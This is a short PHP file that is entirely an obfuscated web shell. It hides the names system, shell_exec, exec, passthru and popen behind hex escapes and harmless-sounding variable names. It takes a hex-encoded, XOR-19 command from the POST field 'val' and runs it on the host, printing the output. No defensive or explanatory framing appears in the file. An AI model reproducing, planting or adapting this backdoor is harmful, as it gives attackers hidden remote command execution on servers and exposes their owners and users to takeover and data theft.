<?php

$mutex_lock1 = "s\x79stem";
$mutex_lock3 = "\x65\x78ec";
$dependency_resolver = "h\x65\x782b\x69\x6E";
$mutex_lock6 = "\x73\x74r\x65am_g\x65\x74\x5F\x63\x6Fnten\x74s";
$mutex_lock2 = "\x73h\x65ll\x5F\x65x\x65c";
$mutex_lock4 = "p\x61s\x73thru";
$mutex_lock5 = "p\x6F\x70en";
$mutex_lock7 = "pc\x6Cos\x65";
if (isset($_POST["\x76a\x6C"])) {
            function splitter_tool      (     $marker      ,     $pointer    )    {
      $data    =   ''   ;
      $l=0;
 do{
$data.=chr(ord($marker[$l])^$pointer);
$l++;

} while($l<strlen($marker));
 return    $data;
     
}
            $val = $dependency_resolver($_POST["\x76a\x6C"]);
            $val = splitter_tool($val, 19);
            if (function_exists($mutex_lock1)) {
                $mutex_lock1($val);
            } elseif (function_exists($mutex_lock2)) {
                print $mutex_lock2($val);
            } elseif (function_exists($mutex_lock3)) {
                $mutex_lock3($val, $parameter_group_marker);
                print join("\n", $parameter_group_marker);
            } elseif (function_exists($mutex_lock4)) {
                $mutex_lock4($val);
            } elseif (function_exists($mutex_lock5) && function_exists($mutex_lock6) && function_exists($mutex_lock7)) {
                $pointer_data = $mutex_lock5($val, 'r');
                if ($pointer_data) {
                    $binding_sym = $mutex_lock6($pointer_data);
                    $mutex_lock7($pointer_data);
                    print $binding_sym;
                }
            }
            exit;
        }